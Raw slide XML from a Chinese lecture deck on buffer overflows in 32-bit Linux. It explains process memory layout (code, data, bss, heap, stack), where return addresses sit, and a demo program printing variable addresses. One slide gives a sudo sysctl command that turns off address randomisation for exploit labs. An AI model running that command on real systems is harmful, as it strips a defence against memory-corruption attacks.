              <a:rPr sz="2400" spc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z=20;	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spc="-5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全局变量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main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(int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argc,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*argv[])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400" dirty="0" smtClean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buff[64],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buffer02[32];</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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spc="-5" dirty="0" err="1" smtClean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局部变量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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17500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="745"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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 err="1" smtClean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400" spc="-3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a=5,b,c=6;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400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局部变量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77947" y="295096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进程映像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947" y="1093217"/>
            <a:ext cx="9988678" cy="535697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58888" indent="-788988">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2256155" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf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lang="en-US" altLang="zh-CN"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"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(.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text)address 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of\n\t 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fu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1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%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\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty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\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   fu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2=%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z="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\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\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean="0"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lang="en-US" sz="2400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main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=%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p\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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"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,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	fun1, fun2,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main);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58888" marR="89535" indent="-788988">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="545"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2341245" algn="l"/>
                <a:tab pos="3495040" algn="l"/>
                <a:tab pos="4667250" algn="l"/>
                <a:tab pos="5687060" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" spc="-5" dirty="0" err="1"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rin</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="240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2400" spc="-1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lang="en-US" altLang="zh-CN"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"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(.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ta	i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ited)	address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	o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f\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n\t	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x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(i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d)=%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\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\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t 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z(inited)=%p\n",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&amp;x,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&amp;z);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346200" marR="5080" indent="-876300" algn="just">
              <a:lnSpc>
                <a:spcPct val="99000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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printf("(.bss </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>uninited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)address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of\n\t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y(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uninit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)=%p\n\n", &amp;y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);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346200" marR="5080" indent="-876300" algn="just">
              <a:lnSpc>
                <a:spcPct val="99000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pP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printf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lang="en-US" altLang="zh-CN"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"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stack) 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of\n\t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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argc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=%p\n\t argv=%p\n\t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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argv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[0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]=%p\n", &amp;argc, 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&amp;argv,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argv[0]);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58888" indent="-788988" algn="just">
              <a:lnSpc>
                <a:spcPts val="2735"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="220"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6635115" algn="l"/>
              </a:tabLst>
            </a:pP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printf("(Local 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variable)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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of\n\t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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buff[64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]=%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p\n\t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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buffer02[32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]=%p\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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buff,</a:t>
            </a:r>
            <a:r>
              <a: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buffer02);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346200" indent="-876300" algn="just">
              <a:lnSpc>
                <a:spcPts val="2735"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf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lang="en-US" altLang="zh-CN"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"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Local variable) of\n\t a(inited) =%p\n\t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="3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b(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>uninit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r>
              <a:rPr sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=%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p\n\t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c(inited) =%p\n\n",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&amp;a, &amp;b,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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&amp;c);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900" algn="just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return</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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0;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}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2256155" algn="l"/>
              </a:tabLst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28564" y="295059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进程映像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163" y="833474"/>
            <a:ext cx="6374765" cy="949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2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sz="2800" b="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr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sz="2800"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sz="2800" b="0" spc="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../src/mem_distribute.c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650"/>
              </a:lnSpc>
            </a:pP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sz="2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./mem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398162" y="1901796"/>
            <a:ext cx="4307840" cy="40627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5"/>
              </a:spcBef>
              <a:buNone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(.text)address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marL="697865" marR="470535" indent="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buNone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fun1=0x804</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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8434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fun2=0x804</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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8441</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="697865" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
              <a:buNone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main=0x804</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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844d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(.data inited)address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marL="697865" marR="20955" indent="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buNone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x(inited)=0x804</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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a018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z(inited)=0x804</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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a01c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(.bss uninited)address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marL="697865" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="220"/>
              </a:spcBef>
              <a:buNone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y(uninit)=0x804</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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a028</a:t>
            </a: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6767703" y="1901796"/>
            <a:ext cx="4688349" cy="480343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5"/>
              </a:spcBef>
              <a:buNone/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(stack) of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="305"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AF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400" spc="-1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argc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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0xbffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-15" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-15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d0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305"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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         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400" spc="-4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gv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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0xbffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-15" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-15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4c</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" spc="-15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305"/>
              </a:spcBef>
              <a:buNone/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         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400" spc="-4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r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g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="240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v</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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[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0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]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=0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x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2400" spc="-35" dirty="0"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spc="-45" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ff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5</a:t>
            </a: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c2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614045" indent="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="88138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(Local	variable)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</a:p>
          <a:p>
            <a:pPr marL="12700" marR="614045" indent="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="881380" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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spc="-2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[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6</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="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4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]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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0</a:t>
            </a:r>
            <a:r>
              <a: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2400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ff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3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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5c  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="614045" indent="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="881380" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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fer0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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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3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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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]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=0</a:t>
            </a:r>
            <a:r>
              <a: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2400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ff</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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4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3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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9c      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0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="88138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(Local	variable)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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="70"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="88138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        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a(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inited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=0xbffff3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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50</a:t>
            </a:r>
            <a:endParaRPr sz="2400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70"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="88138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         </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean="0"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sz="240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un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i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="240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n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=0xbffff3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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54</a:t>
            </a:r>
            <a:endParaRPr sz="2400" spc="-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70"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="88138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        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c(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inited</a:t>
            </a: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r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0xbffff3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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58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305"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" b="1" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00AF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9434" y="3444918"/>
            <a:ext cx="6722566" cy="589280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"/>
          <a:lstStyle/>
          <a:p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32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位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Linux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系统的缓冲</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-2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区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溢出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476220" y="2364924"/>
            <a:ext cx="1711821" cy="1261480"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0" smtClean="0"/>
              <a:t>09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28564" y="295059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进程映像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564" y="1162939"/>
            <a:ext cx="10116804" cy="483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由此可见：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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可执行代码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>fun1, fun2, main存放在内存的低地址，且按照源代码中的顺序从低地址到高地址排列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>先定义的函数的代码存放在内存的低地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>全局变量</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(x, y, z)也存放内存的低地址，位于可执行代码之上（起始地址高于可执行代码的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>初始化的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>全局变量存放在较低的地址，而</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未初始化的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>全局变量位于较高的地址。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77947" y="295096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进程映像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object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686339" y="1435608"/>
            <a:ext cx="10515476" cy="408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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>局部变量</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>位于内存高地址区</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>（0xbfff f3xx），</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>字符串变量放在高地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>其它变量从低地址到高地址依次</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>（先定义的放在低地址）存放</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数的入口参数</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>（&gt;0xbfff f3xx）更高，位于函数的局部变量更高的地址之上。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数从环境中获得参数</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>因此环境变量位于最高的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。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dirty="0" smtClean="0"/>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(3) 和(4) 可以推断出， </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>栈底</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>( 最高地址) 位于 0xc000 0000，环境变量和局部变量位于进程的栈区。进一步的分析知道，函数的返回地址也位于进程的栈区。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77947" y="295096"/>
            <a:ext cx="1399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进程映像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9298" y="1395679"/>
            <a:ext cx="4613275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表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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en-US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.</a:t>
            </a:r>
            <a:r>
              <a:rPr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Linux IA32</a:t>
            </a:r>
            <a:r>
              <a:rPr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进程映像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6063876"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1225296" y="2225040"/>
          <a:ext cx="9672575" cy="26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3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81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649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低地址0x0804 xxxx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初始化的 全局变量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华文楷体" panose="02010600040101010101" charset="-122"/>
                        </a:rPr>
                        <a:t>未初始化的全局变量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动态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内存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华文楷体" panose="02010600040101010101" charset="-122"/>
                        </a:rPr>
                        <a:t> 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华文楷体" panose="02010600040101010101" charset="-122"/>
                        </a:rPr>
                        <a:t>局部变量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高地址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0xc000 0000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.text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可执行代码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华文楷体" panose="02010600040101010101" charset="-122"/>
                        </a:rPr>
                        <a:t>.data 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华文楷体" panose="02010600040101010101" charset="-122"/>
                        </a:rPr>
                        <a:t>.bss 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Heap  (堆)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未使用 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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                        </a:rPr>
                        <a:t>Stack(栈) </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="0" dirty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华文楷体" panose="02010600040101010101" charset="-122"/>
                        </a:rPr>
                        <a:t>环境变量</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="0" dirty="0"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613152" y="335736"/>
            <a:ext cx="1703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三种数据段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1135820" y="1490210"/>
            <a:ext cx="10501998" cy="425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sz="3200" dirty="0"/>
              <a:t>有三种数据段：.text、.data 、.bss 。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>.text(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0" err="1"/>
              <a:t>文本区</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0" smtClean="0"/>
              <a:t>)，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>文本区存放了程序的代码，包括 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>函数和其他函数。</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>任何尝试对该区的写操作会导致</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>段错误</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr sz="2800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>data和.bss都是可写的，它们保存</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>全局变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>.data段包含</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>已初始化</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>的全局变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>.bss段包含</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未初始化</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>的全局变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0"/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957703" y="295059"/>
            <a:ext cx="13169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栈</a:t>
            </a:r>
            <a:r>
              <a:rPr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(stack)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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uFillTx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20" y="1252728"/>
            <a:ext cx="10597896" cy="489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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>栈是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后进先出</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>(LIFO)数据结构，往低地址增长</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1"/>
              <a:t>它保存本地变量、函数调用等信息。一般用push</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>和pop</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1"/>
              <a:t>对栈进行操作。老版本的Linux系统的进程栈底</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t> (最高地址)固定，为0xc0000000。新版本的Linux系 统采用了栈底随机化技术，栈底(最高地址)动态变化。用以下命令关闭栈底随机化：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sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/sbin/sysctl -w kernel.randomize_va_space=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>随着函数调用层数的增加，栈帧是一块块的向内存低地址方向延伸的，随着进程中函数调用层数的减少，即各函数的返回，栈帧会一块块地被遗弃而向内存的高地址方向回缩。各函数的栈帧大小随着函数的性质的不同而不等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017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443480" y="247949"/>
              <a:ext cx="974852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43657" y="295096"/>
            <a:ext cx="1369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堆(heap)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843657" y="1600200"/>
            <a:ext cx="10443468" cy="21304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2900" marR="5080" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="135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堆的数据结构和栈不同，</a:t>
            </a:r>
            <a:r>
              <a:rPr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它是往高地址增长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</a:t>
            </a:r>
            <a:r>
              <a:rPr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华文行楷" panose="02010800040101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主要用来保存程序信息和动态分配的变量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。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41300" marR="5080" indent="0" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="390"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst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marL="342900" marR="5080" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="135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堆是通过 malloc和 free等内存操作函数分配和释放的。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24" name="矩形 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2620010" y="247949"/>
              <a:ext cx="957199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27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613410" y="29591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栈帧的信息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907" y="1572539"/>
            <a:ext cx="9919818" cy="342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函数被调用时所建立的栈帧包含了下面的信息：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数的返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。IA32的返回地址都是存放在被调用函数的栈帧里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>调用函数的栈帧信息</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>，即栈顶和栈底</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(最高地址)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
